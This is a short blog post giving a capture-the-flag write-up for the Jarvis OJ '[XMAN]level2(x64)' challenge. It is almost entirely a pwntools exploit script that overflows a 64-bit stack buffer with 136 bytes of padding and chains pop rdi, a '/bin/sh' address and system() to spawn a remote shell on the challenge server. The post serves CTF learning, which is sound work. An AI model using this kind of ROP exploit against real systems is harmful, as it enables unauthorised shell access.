[XMAN]level2(x64)

nc pwn2.jarvisoj.com 9882

 



level2_x64.04d700633c6dc26afc6a1e7e9df8c94e

 

64位栈溢出,exp如下:

from pwn import *

#io = process('./level2_x64')
io = remote('pwn2.jarvisoj.com', 9882)
pop_rdi = 0x4006b3
system_addr = 0x4004C0
binsh_addr = 0x600A90

io.recvuntil('Input:\n')
payload = b'a' * 136 + p64(pop_rdi) + p64(binsh_addr) + p64(system_addr)
io.send(payload)

io.interactive()

 

posted @ 2021-07-17 16:47  hktk1643  阅读(67)  评论(0编辑  收藏  举报